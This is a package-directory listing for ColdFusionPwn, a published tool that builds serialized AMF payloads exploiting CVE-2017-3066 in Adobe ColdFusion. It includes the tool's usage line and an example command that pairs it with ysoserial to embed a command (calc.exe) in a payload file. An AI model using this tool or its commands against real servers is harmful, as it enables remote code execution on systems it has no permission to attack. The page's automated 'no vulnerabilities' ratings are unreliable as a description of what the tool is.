ColdFusionPwn | Exploitation Tool for CVE-2017-3066 targeting Adobe

 by   codewhitesec Java Version: 0.0.1 License: MIT

kandi X-RAY | ColdFusionPwn Summary

kandi X-RAY | ColdFusionPwn Summary

ColdFusionPwn is a Java library. ColdFusionPwn has no bugs, it has no vulnerabilities, it has build file available, it has a Permissive License and it has low support. You can download it from GitHub.

The tool allows you to generate serialized AMF-payloads to exploit the missing input validation of allowed classes. For details see our blog post.
Support
    Quality
      Security
        License
          Reuse

            kandi-support Support

              ColdFusionPwn has a low active ecosystem.
              It has 59 star(s) with 22 fork(s). There are 6 watchers for this library.
              OutlinedDot
              It had no major release in the last 12 months.
              There are 0 open issues and 2 have been closed. On average issues are closed in 0 days. There are no pull requests.
              It has a neutral sentiment in the developer community.
              The latest version of ColdFusionPwn is 0.0.1

            kandi-Quality Quality

              ColdFusionPwn has 0 bugs and 0 code smells.

            kandi-Security Security

              ColdFusionPwn has no vulnerabilities reported, and its dependent libraries have no vulnerabilities reported.
              ColdFusionPwn code analysis shows 0 unresolved vulnerabilities.
              There are 0 security hotspots that need review.

            kandi-License License

              ColdFusionPwn is licensed under the MIT License. This license is Permissive.
              Permissive licenses have the least restrictions, and you can use them in most projects.

            kandi-Reuse Reuse

              ColdFusionPwn releases are available to install and integrate.
              Build file is available. You can build the component from source.
              Installation instructions, examples and code snippets are available.

            Top functions reviewed by kandi - BETA

            kandi has reviewed ColdFusionPwn and discovered the below as its top functions. This is intended to give you an instant insight into ColdFusionPwn implemented functionality, and help decide if they suit your requirements.
            • Main entry point
            • Generate an audit message
            • Generate Yso serialized payload
            • Prints the usage
            • Writes the object to the specified stream
            • Returns the state of the payload
            Get all kandi verified functions for this library.

            ColdFusionPwn Key Features

            No Key Features are available at this moment for ColdFusionPwn.

            ColdFusionPwn Examples and Code Snippets

            ColdFusionPwn,Usage
            Javadot img1Lines of Code : 5dot img1License : Permissive (MIT)
            copy iconCopy
            java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner [-s|-e] [payload type] '[command]' [outfile]
            
            - [-s|-e]         Setter (CF11) or Externalizable Exploit (CF11/12) technique
            - [  
            ColdFusionPwn,Examples
            Javadot img2Lines of Code : 1dot img2License : Permissive (MIT)
            copy iconCopy
            java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 calc.exe /tmp/out.amf
              

            Community Discussions

            No Community Discussions are available at this moment for ColdFusionPwn.Refer to stack overflow page for discussions.

            Community Discussions, Code Snippets contain sources that include Stack Exchange Network

            Vulnerabilities

            No vulnerabilities reported

            Install ColdFusionPwn

            Get the latest version of ysoserial. Get ColdFusionPwn from releases.

            Support

            For any new features, suggestions and bugs create an issue on GitHub. If you have any questions check and ask questions on community page Stack Overflow .
            Find more information at:

            Find, review, and download reusable Libraries, Code Snippets, Cloud APIs from over 650 million Knowledge Items

            Find more libraries
            CLONE
          • HTTPS

            https://github.com/codewhitesec/ColdFusionPwn.git

          • CLI

            gh repo clone codewhitesec/ColdFusionPwn

          • sshUrl

            git@github.com:codewhitesec/ColdFusionPwn.git

          • Stay Updated

            Subscribe to our newsletter for trending solutions and developer bootcamps

            Agree to Sign up and Terms & Conditions

            Share this Page

            share link

            Consider Popular Java Libraries

            CS-Notes

            by CyC2018

            JavaGuide

            by Snailclimb

            LeetCodeAnimation

            by MisterBooo

            spring-boot

            by spring-projects

            Try Top Libraries by codewhitesec

            HandleKatz

            by codewhitesecC

            LethalHTA

            by codewhitesecC#

            Lastenzug

            by codewhitesecGo

            UnmarshalPwn

            by codewhitesecC++

            SysmonEnte

            by codewhitesecC